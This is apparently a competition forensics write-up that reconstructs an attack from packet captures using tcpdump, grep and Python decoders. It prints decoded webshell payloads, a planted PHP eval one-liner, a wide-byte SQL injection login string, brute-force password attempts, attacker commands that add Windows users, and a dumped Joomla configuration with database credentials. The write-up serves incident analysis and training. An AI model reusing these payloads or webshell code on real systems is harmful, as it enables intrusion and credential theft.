Information Security Triathlon Finals summary (enterprise round)
Information Security Triathlon Finals (data round), question 2
Information Security Triathlon Finals (data round), question 3
Information Security Triathlon Finals (data round), question 4
First, following a teammate's discovery, the attacker's IP was identified as 172.16.10.121.
The command below extracts every HTTP request and response (every packet with a non-empty TCP payload) exchanged with that host. Wrapped in a short shell script, extracting everything from all the captures took only about two minutes.
tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r 1_00005_20170908171421.pcap > 5
#!/bin/bash
# For every pcap in the current directory, dump the packets exchanged with the attacker
# that carry a TCP payload (i.e. the HTTP requests and responses), one text file per
# capture, then concatenate them into http/http.txt for grepping.
target_file='http.txt'
target_folder='http'
mkdir -p "${target_folder}"
: > "${target_folder}/${target_file}"
for file in *.pcap; do
    echo "Dumping http packets in ${file}..."
    tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r "${file}" > "${target_folder}/${file}.txt"
    echo "${file} Done!"
done
# Only the per-capture dumps are merged, so http.txt is never appended to itself
for file in "${target_folder}"/*.pcap.txt; do
    cat "${file}" >> "${target_folder}/${target_file}"
done
Doing the same in Wireshark would take far longer; it is hard not to marvel at how powerful the command-line tools are.
Then go into the http folder and simply search for the keywords typical of common web attacks.
For example, the following questions:
- Give the IP range the attacker port-scanned on the internal network
For the first question: since the attacker was pivoting into the internal network, the tool reGeorg may well have been used.
Its most telling keywords are tunnel, tunnel.php and tunnel.nosocket.php, so try searching for them:
grep -r -n 'tunnel.php' http.txt
Many results like the following appear:
POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.131&port=21
In fact, anyone familiar with reGeorg can search straight for the keyword
?cmd=connect&target=
because reGeorg uses this interface every time it opens a new TCP connection.
grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F ' HTTP' '{print $1}' | sort | uniq | sed 's/\&port\=/ /g'
grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F '&port' '{print $1}' | sort | uniq
Either form of the command answers the question.
Answer: 192.168.28.120-192.168.28.135
- The connection password of the first webshell the attacker used
Since it is a webshell and the site runs PHP, start by searching for keywords such as eval / assert:
grep -n 'eval(' [0-9]*.txt
Because the captures supplied by the organisers are already in chronological order, the webshell password used during the external pentest must be Jshell; the one used for the internal pentest should be Bshell or cmd_shell.
- The webshell connection password the attacker used on BlueCMS during the internal pentest
Answer: Bshell
- The IP of the first network adapter on the internal bluecms host
A network adapter IP means the attacker most likely ran the system's ipconfig or ifconfig command, so grep directly for those keywords.
Answer: 192.168.20.117
It is a Windows server.
- The attacker added a user on the internal network; find the username and password
Since it is a Windows server, the command for adding a user is naturally net user [USERNAME] [PASSWORD] /add:
cat -n http.txt | grep 71202 | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
net user hacker hacker /add
At this point I think it is better not to rush through the questions but first to work out the attacker's whole attack flow.
Start with the one-line webshells, beginning with JShell:
grep 'Jshell=' http.txt | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
import base64
import urllib.parse

# Each line of "shell" is one raw (URL-encoded) Jshell POST body grepped out of http.txt
with open("shell") as f:
    for line in f:
        print("-" * 32)
        data = urllib.parse.unquote(line.strip()).split("&")
        print(data)
        # data[0] is the "Jshell=@eval(base64_decode($_POST[z0]));" stub; the rest are z0, z1, ...
        for param in data[1:]:
            key, _, value = param.partition("=")
            # Pad to a multiple of 4 and base64-decode; values that are not base64 are printed as-is
            try:
                decoded = base64.b64decode(value + "=" * (-len(value) % 4), validate=True).decode("utf-8", "replace")
            except ValueError:
                decoded = value
            print("%s=%s" % (key, decoded))
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// get the operating system information and the user name
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// list every file in the directory C:\\phpstudy\\WWW\\joomla\\
y.P.l.l...Rb.P.......8 12:47:10 1212 0666
LICENSE.txt 2015-09-08 12:47:10 18092 0666
README.txt 2015-09-08 12:47:10 4213 0666
robots.txt 2015-09-08 12:47:10 842 0666
web.config.txt 2015-09-08 12:47:10 1690 0666
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\tunnel.php
z2=
// upload a file to C:\\phpstudy\\WWW\\joomla\\tunnel.php
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// list every file in the directory C:\\phpstudy\\WWW\\joomla\\
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
// run the system command netstat -an | find "ESTABLISHED"
第二题 ›› strings *.pcap | grep ESTABLISHED
->| TCP 127.0.0.1:1629 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:1629 ESTABLISHED
TCP 192.168.20.117:80 172.16.10.115:1628 ESTABLISHED
TCP 192.168.20.117:80 172.16.10.121:62858 ESTABLISHED
TCP 192.168.20.117:80 172.16.10.121:62859 ESTABLISHED
TCP 192.168.20.117:1628 172.16.10.115:80 ESTABLISHED
TCP 192.168.28.130:2318 192.168.28.131:21 ESTABLISHED
TCP 192.168.28.130:2322 192.168.28.131:21 ESTABLISHED
TCP 192.168.28.130:3473 192.168.28.131:21 ESTABLISHED
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&whoami&echo [S]&cd&echo [E]
// run the system command whoami
admin-6ef5d71ed\administrator
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&ipconfig&echo [S]&cd&echo [E]
// run the system command ipconfig
->|
Windows IP Configuration
Ethernet adapter ........ 2:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.117
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.1
Ethernet adapter ........:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.28.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
[S]
C:\phpstudy\WWW\joomla
[E]
|<-
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /addd&echo [S]&cd&echo [E]
// run the system command net user hacker hacker /addd
// syntax error, the command failed
->|.... /ADDD ......
..............:
NET USER
[username [password | *] [options]] [/DOMAIN]
username {password | *} /ADD [options] [/DOMAIN]
username [/DELETE] [/DOMAIN]
...... NET HELPMSG 3506 ..................
[S]
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /add&echo [S]&cd&echo [E]
// run the system command net user hacker hacker /add
Executed successfully
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// read the contents of C:\\phpstudy\\WWW\\joomla\\configuration.php
->|<?php
class JConfig {
public $offline = '0';
public $offline_message = '.....................<br /> ..................';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'test';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'mysqlpasswd';
public $db = 'joomla';
public $dbprefix = 'shf76_';
public $live_site = '';
public $secret = 'BjbqVIMNAt3nB7Dc';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '';
public $ftp_port = '';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $mailonline = '1';
public $mailer = 'mail';
public $mailfrom = 'admin@123.com';
public $fromname = 'test';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $MetaDesc = 'sssss';
public $MetaKeys = '';
public $MetaTitle = '1';
public $MetaAuthor = '1';
public $MetaVersion = '0';
public $robots = '';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $log_path = 'C:\\phpstudy\\WWW\\joomla/logs';
public $tmp_path = 'C:\\phpstudy\\WWW\\joomla/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $memcache_persist = '1';
public $memcache_compress = '0';
public $memcache_server_host = 'localhost';
public $memcache_server_port = '11211';
public $memcached_persist = '1';
public $memcached_compress = '0';
public $memcached_server_host = 'localhost';
public $memcached_server_port = '11211';
public $redis_persist = '1';
public $redis_server_host = 'localhost';
public $redis_server_port = '6379';
public $redis_server_auth = '';
public $redis_server_db = '0';
public $proxy_enable = '0';
public $proxy_host = '';
public $proxy_port = '';
public $proxy_user = '';
public $proxy_pass = '';
public $massmailoff = '0';
public $MetaRights = '';
public $sitename_pagetitles = '0';
public $force_ssl = '0';
public $session_memcache_server_host = 'localhost';
public $session_memcache_server_port = '11211';
public $session_memcached_server_host = 'localhost';
public $session_memcached_server_port = '11211';
public $frontediting = '1';
public $feed_email = 'author';
public $cookie_domain = '';
public $cookie_path = '';
public $asset_id = '1';
|<-
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// read the contents of C:\\phpstudy\\WWW\\joomla\\configuration.php
Now let's see how this Jshell was written to the server.
The first three lines should be the file contents being written through the vulnerability.
You can see that the attacker used the file
/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA
to edit index.php ("L2luZGV4LnBocA".decode("base64") == "index.php"),
inserting one line into index:
<?php eval($_POST['Jshell']);?>
Tracing further back: how did the attacker log in?
http ›› grep -n -C 32 'POST /administrator/' [0-9]*.txt | grep 'username' | grep -o 'username.*'
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=admin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=apple&lang=&option=com_login&task=login&return=aW5kZXgucGhw&f2426d9ea34e95fe916e6309d7028835=1
username=admin&passwd=apple&option=com_login&task=login&return=aW5kZXgucGhw&2bb30f381fad54b0ca7f4088e7e9cc97=1
You can see that the attacker brute-forced the administrator password beforehand.
The last two attempts use the same credentials, admin/apple, which is very likely the correct password.
Compare the earlier and the final response packets:
with a wrong password the server returned 303 See Other and redirected to /administrator/index.php,
and in the content of index.php you can find:
<p class="alert-message">Username and password do not match or you do not have an account yet.</p>
On the genuine successful login it also returns 303 and redirects to /administrator/index.php,
but the content of index.php is clearly different.
So the attacker obtained the administrator password admin/apple by brute force.
That more or less completes the analysis of Jshell.
Next, let's look at how the attacker uploaded Bshell.
Bshell sits on the internal network; the attacker pivoted in through reGeorg, using tunnel.php as the jump file.
There is a small trick here:
in tunnel.php's implementation, each independent TCP connection is maintained within a single Session,
so the PHPSESSID can be used to follow the HTTP requests that belong to one connection into the internal network.
The URL that opens a new connection looks like ?cmd=connect&target=8.8.8.8&port=8888
Sending data: ?cmd=forward
Reading data: ?cmd=read
Disconnecting: ?cmd=disconnect
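As an added example (not part of the original writeup), the session-tracking trick above and the grep/sort pipeline from the first question can be combined: pair each tunnel.php request in the tcpdump -A text with the PHPSESSID that follows it (the Set-Cookie in the reply to the first connect, or the Cookie header of later requests), group by session to get one tunnelled TCP connection per PHPSESSID, and derive the scanned address range from the connect targets. The request lines are constructed sample input.

```python
import re
from collections import OrderedDict
from urllib.parse import parse_qs, urlparse

# Constructed sample in the shape of the tcpdump -A text: a tunnel.php request line,
# followed by the PHPSESSID that goes with it (Set-Cookie in the reply to the first
# connect, Cookie header on every later request of that session).
SAMPLE = """\
POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.131&port=21 HTTP/1.1
Set-Cookie: PHPSESSID=aaa111; path=/
POST http://172.16.10.115/tunnel.php?cmd=forward HTTP/1.1
Cookie: PHPSESSID=aaa111
POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.120&port=80 HTTP/1.1
Set-Cookie: PHPSESSID=bbb222; path=/
POST http://172.16.10.115/tunnel.php?cmd=read HTTP/1.1
Cookie: PHPSESSID=aaa111
POST http://172.16.10.115/tunnel.php?cmd=disconnect HTTP/1.1
Cookie: PHPSESSID=bbb222
POST http://172.16.10.115/tunnel.php?cmd=disconnect HTTP/1.1
Cookie: PHPSESSID=aaa111
"""

REQUEST = re.compile(r"^(?:GET|POST) (\S*tunnel\S*\.php\?\S+) HTTP/1\.[01]")
SESSION = re.compile(r"PHPSESSID=([0-9A-Za-z]+)")


def tunnel_requests(text):
    """Yield (phpsessid, cmd, target, port) for each tunnel.php request, in capture order."""
    pending = None
    for line in text.splitlines():
        m = REQUEST.match(line)
        if m:
            q = parse_qs(urlparse(m.group(1)).query)
            pending = (q.get("cmd", [""])[0], q.get("target", [None])[0], q.get("port", [None])[0])
            continue
        s = SESSION.search(line)
        if s and pending:
            yield (s.group(1),) + pending
            pending = None


def reconstruct_sessions(text):
    """Group tunnel commands by PHPSESSID; one session is one tunnelled TCP connection."""
    sessions = OrderedDict()
    for sid, cmd, target, port in tunnel_requests(text):
        entry = sessions.setdefault(sid, {"target": None, "port": None, "cmds": []})
        if cmd == "connect":
            entry["target"], entry["port"] = target, int(port) if port else None
        entry["cmds"].append(cmd)
    return sessions


def scanned_range(sessions):
    """Lowest and highest connect target, the same reduction the sort | uniq pipeline gives."""
    ips = sorted({s["target"] for s in sessions.values() if s["target"]},
                 key=lambda ip: tuple(int(o) for o in ip.split(".")))
    return (ips[0], ips[-1]) if ips else None


if __name__ == "__main__":
    sessions = reconstruct_sessions(SAMPLE)
    for sid, s in sessions.items():
        print(sid, s["target"], s["port"], " -> ".join(s["cmds"]))
    print("scanned range:", scanned_range(sessions))
```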
The login took place here:
admin_name=simple%d5%27%20or%201%3d1%23&admin_pwd=simple&submit=%B5%C7%C2%BC&act=do_login
// a wide-byte injection was used here to log in directly
Then the template editor /admin/tpl_manage.php was used to edit ../data/config.php.
At this point the attacker has created the webshell; next let's analyse how it was used:
grep -o 'Bshell.*' http.txt > Bshell
import base64
import urllib.parse

# Each line of "Bshell" is one raw (URL-encoded) Bshell POST body grepped out of http.txt
with open("Bshell") as f:
    for line in f:
        print("-" * 32)
        data = urllib.parse.unquote(line.strip()).split("&")
        print(data)
        # data[0] is the "Bshell=@eval(base64_decode($_POST[z0]));" stub; the rest are z0, z1, ...
        for param in data[1:]:
            key, _, value = param.partition("=")
            # Pad to a multiple of 4 and base64-decode; values that are not base64 are printed as-is
            try:
                decoded = base64.b64decode(value + "=" * (-len(value) % 4), validate=True).decode("utf-8", "replace")
            except ValueError:
                decoded = value
            print("%s=%s" % (key, decoded))
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// get the target server's system information and user name
->|C:/phpstudy/WWW/bluecms/data C:D: Windows NT OA-43EAD51FB6C5 5.1 build 2600 (Windows XP Professional Service Pack 3) i586(Administrator)|<-
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// list every file in the target server's C:\\ directory
addons/ 2017-08-29 03:38:21 0 0777
Documents and Settings/ 2017-09-06 03:58:45 0 0777
phpstudy/ 2017-09-06 03:39:12 0 0777
Program Files/ 2017-09-06 03:53:46 0 0555
RECYCLER/ 2017-08-29 03:37:07 0 0777
System Volume Information/ 2017-07-24 03:56:23 0 0777
WINDOWS/ 2017-08-28 06:55:01 0 0777
AUTOEXEC.BAT 2017-07-24 03:54:32 0 0777
boot.ini 2017-07-24 03:52:40 211 0666
bootfont.bin 2008-04-14 12:00:00 322730 0444
CONFIG.SYS 2017-07-24 03:54:32 0 0666
IO.SYS 2017-07-24 03:54:32 0 0444
MSDOS.SYS 2017-07-24 03:54:32 0 0444
NTDETECT.COM 2008-04-14 12:00:00 47564 0555
ntldr 2008-04-14 12:00:00 257728 0444
pagefile.sys 2017-09-07 11:47:21 805306368 0666
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// list every file in the target server's C:\\ directory
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// run the system command net user bluehacker redhacker1@3 /add
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// run the system command net user bluehacker redhacker1@3 /add
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// list every file in the target server's C:\\phpstu directory
->|./ 2017-09-07 08:26:56 0 0777
../ 2017-09-06 03:39:12 0 0777
bluecms/ 2017-09-07 08:27:01 0 0777
metinfo/ 2017-09-07 07:05:58 0 0777
phpMyAdmin/ 2017-09-06 03:38:48 0 0777
l.php 2014-02-27 15:02:21 21201 0666
phpinfo.php 2013-05-09 12:56:36 23 0666
|<-
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// list every file in the target server's C:\\phpstu directory
--------------------------------
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\
// list every file in the target server's C:\\phpstudy\\WWW\\ directory
->|./ 2017-09-07 08:27:01 0 0777
../ 2017-09-07 08:26:56 0 0777
admin/ 2017-09-07 08:27:02 0 0777
api/ 2017-09-07 08:27:01 0 0777
data/ 2017-09-07 08:33:05 0 0777
images/ 2017-09-07 08:27:01 0 0777
include/ 2017-09-07 08:26:59 0 0777
install/ 2017-09-07 08:26:57 0 0777
js/ 2017-09-07 08:26:57 0 0777
templates/ 2017-09-07 08:26:56 0 0777
uc_client/ 2017-09-07 08:26:56 0 0777
ad_js.php 2010-02-08 13:40:00 869 0666
ann.php 2010-02-08 13:39:54 2478 0666
category.php 2010-02-08 13:47:48 8821 0666
comment.php 2010-02-08 13:39:40 3531 0666
guest_book.php 2010-02-08 13:51:28 2538 0666
index.php 2010-02-08 13:40:08 7471 0666
info.php 2010-02-08 13:50:02 4527 0666
info_index.php 2010-02-08 13:50:50 1869 0666
news.php 2010-01-07 10:02:34 3477 0666
news_cat.php 2010-02-08 13:54:52 2069 0666
publish.php 2010-02-09 03:40:36 9185 0666
robots.txt 2009-12-01
--------------------------------
